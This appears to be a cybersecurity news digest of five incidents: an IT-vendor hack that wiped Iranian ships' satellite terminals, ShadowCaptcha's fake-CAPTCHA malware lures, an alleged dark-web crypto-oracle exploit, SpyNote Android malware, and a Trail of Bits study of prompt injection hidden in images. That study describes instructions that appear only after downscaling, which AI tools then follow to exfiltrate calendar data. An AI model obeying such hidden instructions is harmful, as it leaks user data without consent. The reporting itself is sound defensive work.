Iranian Shipping Crippled Through Maritime Communications Hack
In late August 2025, a coordinated cyberattack crippled Iran’s maritime communications, severing satellite links, navigation data, and port coordination for 64 vessels. The operation, attributed to the hacktivist group Lab-Dookhtegan, did not directly breach each ship but instead compromised Fanava Group, the Iranian IT provider that manages satellite terminals for the country’s tanker and cargo fleets, highlighting the risks associated with third-party vendors. By exploiting unpatched flaws in outdated iDirect Falcon systems running Linux kernel 2.6.35, the attackers gained root access. They mapped the fleet through a centralized MySQL database containing modem serial numbers, vessel configurations, and IP phone records. This blueprint allowed them to execute commands that overwrote critical partitions on shipboard systems with zeroed data, wiping navigation logs, archives, configurations, and even recovery slices. Remote restoration became impossible, forcing each vessel to require physical intervention for full system reinstalls—a process that could sideline ships for weeks or months. Researchers confirmed that the attackers had been inside these networks since at least May, quietly conducting reconnaissance and testing before launching a destructive blackout that rendered terminals across the fleet inoperable. The disruption struck NITC and IRISL, two sanctioned operators central to Iran’s covert oil trade, at a time of mounting U.S. Treasury sanctions against companies tied to Iranian exports. Without functioning Falcon terminals, the ships lost email, automated weather updates, AIS tracking, and the ability to coordinate with ports—raising the risk of collisions, delays, or seizure in contested waters. Evidence also showed exfiltration of plain-text phone credentials, exposing vessels to potential eavesdropping or impersonation. The scale and precision of the attack underscore how a single supplier compromise can cascade into strategic paralysis across an entire industry, particularly when reliant on legacy, unpatched systems. By embedding malicious cron jobs and orchestrating shutdowns across dozens of vessels simultaneously, Lab-Dookhtegan delivered a targeted blow with geopolitical implications, demonstrating the fragility of maritime infrastructure against cyber sabotage. Additionally, while this incident targeted Iran, it underscores a global risk, as vessels worldwide often rely on the same legacy communication systems that, if compromised, could lead to similar large-scale disruptions. This incident highlights the urgent need for strict patching regimes, segmentation of management interfaces, and zero-trust controls to secure critical communications networks and prevent supply chain attacks of this magnitude.
Hidden Prompts in Images Expose AI Systems to Data Theft
Researchers have revealed a new type of attack that hides malicious instructions inside images before they are sent to AI systems. The trick exploits the fact that most platforms automatically reduce image resolution for efficiency, which introduces small artifacts that can reveal hidden patterns. By carefully crafting full-resolution images, attackers can make invisible instructions appear once the image is downscaled through standard methods, including nearest neighbor, bilinear, or bicubic interpolation. Trail of Bits demonstrated how dark areas of an image could shift into visible text after downscaling, leading the AI to read and follow instructions that the user never intended to give. To prove the risk, they showed a case where Google Calendar data was exfiltrated by hiding a command in an uploaded image. Since the process is invisible to users, everything looks normal while the AI quietly executes malicious actions. Testing confirmed this technique works against multiple platforms, including Gemini CLI, Vertex AI Studio, Google Assistant, and other systems that rely on automated image handling. To make the attack more accessible, the team released Anamorpher, a tool that generates images tailored for different downscaling methods. Because the technique exploits a common preprocessing step, it has the potential to impact a wide range of AI tools beyond those tested. The researchers stress that image uploads should be tightly controlled with clear limits on size and dimension, and that users should see a preview of the final downscaled image that the AI will process. They also advise requiring confirmation before sensitive tool actions are executed, especially when text is detected inside images. The best protection is to build stronger system-level defenses that can resist prompt injection across all channels, and organizations should treat every multimodal input as a possible attack surface.
ShadowCaptcha Campaign Abuses WordPress Sites for Multi-Stage Attacks
The ShadowCaptcha campaign has been observed exploiting more than 100 compromised WordPress sites to redirect visitors to fake CAPTCHA verification pages that mimic Cloudflare or Google services. These sites have been injected with malicious JavaScript code that initiates a redirection chain, ultimately delivering a carefully crafted social engineering lure known as ClickFix. Once on the fraudulent CAPTCHA page, victims are presented with instructions that branch into two possible attack flows. In one, users are tricked into pasting copied commands into the Windows Run dialog, which then launches MSI installers or remote HTA files to deploy Lumma and Rhadamanthys information stealers. In the other, victims are persuaded to save and execute a malicious HTML Application file, which results in the delivery of Epsilon Red ransomware. Researchers noted that the compromised pages automatically run obfuscated JavaScript to copy malicious commands into the clipboard without requiring user interaction, relying on the user to paste them unknowingly. Additional stealth measures include anti-debugging techniques to block inspection of browser developer tools and DLL side-loading to make malware run under the guise of legitimate processes. The scale of the campaign is significant, with most compromised WordPress sites hosted in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning various industries, including healthcare, hospitality, finance, law, and technology. The operation shows how attackers can transform simple web compromises into multi-stage intrusions that lead to widespread credential harvesting, resource hijacking, and ransomware outbreaks. ShadowCaptcha demonstrates the growing sophistication of social engineering combined with the abuse of trusted platforms, making WordPress security a frontline defense. To reduce risk, administrators must harden WordPress deployments with timely patching, enable multi-factor authentication for administrator logins, and educate users to recognize fake CAPTCHA prompts that serve as gateways to infection.
SOCRadar Detects Alleged Oracle 0-Day Exploit Listing on Dark Web
Researchers at SOCRadar recently flagged a dark web forum post advertising, according to the seller, a zero-day vulnerability affecting Oracle-based crypto protocols. According to the listing, the exploit enables attackers to manipulate market data feeds and trigger profitable self-liquidation events. The post describes this technique as a two-step process: first, altering oracle data to present false prices, and second, using those manipulated prices to force liquidation bonuses greater than the debts being repaid. The seller further claims that the attack could repeatedly drain collateral from a protocol until it reaches insolvency, leading to catastrophic financial loss. A proof-of-concept (POC) and step-by-step instructions are allegedly included, with the price “negotiated” directly with interested buyers. That said, it is essential to emphasize that this information cannot be independently verified. Dark web listings frequently exaggerate, misrepresent, or outright fabricate exploits to attract attention or scam buyers. While this post aligns with real-world attack scenarios seen in decentralized finance—where oracle manipulation has been a frequent vector—the claim itself should not be treated as actionable intelligence. Instead, it serves as an indicator of awareness that threat actors continue to prioritize oracle-based attacks due to their potential for a high financial payoff. Security teams managing crypto protocols should view this as a reminder to harden oracle integrations, deploy anomaly detection for suspicious market data patterns, and rehearse incident response plans tailored to manipulation and liquidation scenarios.
Update: SpyNote Malware Resurfaces Through Fake Google Play Store Campaigns
Researchers have observed a new wave of SpyNote malware targeting Android users through fake Google Play Store pages that appear to be legitimate. These fraudulent websites replicate legitimate installation interfaces by using stolen HTML and CSS code to deceive users into downloading malicious APKs. The campaigns target individuals searching for well-known apps across social, gaming, and utility categories, with names such as iHappy, CamSoda, 8 Ball Pool, Block Blast, and Chrome being impersonated. When victims click the install button, embedded JavaScript automatically begins downloading malware-laden files from the attacker's controlled infrastructure. Investigations reveal that these operations share a consistent digital footprint, with IP addresses tied to Lightnode Limited and Vultr Holdings, domains registered under NameSilo and XinNet, and SSL certificates issued by R10 and R11 to appear trustworthy. This recurring infrastructure highlights a coordinated and persistent effort to spread the trojan at scale. The latest SpyNote samples feature sophisticated anti-analysis measures that make detection and research significantly more challenging. The initial dropper APK conceals its payload behind AES-encrypted assets, with the decryption key derived directly from its package name. Once unlocked, the malware utilizes DEX Element Injection to manipulate Android’s ClassLoader, ensuring that malicious code executes ahead of legitimate functions. This allows SpyNote to hijack app behavior, intercept data, and bypass static analysis through code obfuscation tricks involving confusing identifier variations. Once installed, it operates as a full-featured Remote Access Trojan, capable of activating cameras and microphones, stealing credentials and two-factor authentication codes, performing overlay attacks, keylogging, and even wiping or locking devices if it is granted administrator rights. With its ability to exfiltrate sensitive data and maintain deep control, SpyNote poses a significant privacy and financial risk to mobile users. Experts emphasize the importance of enhancing browser-based detection of fake app stores, refining automated malware analysis for Android apps, and incorporating network-level filtering into mobile VPNs to disrupt these advanced campaigns before they reach end-users.
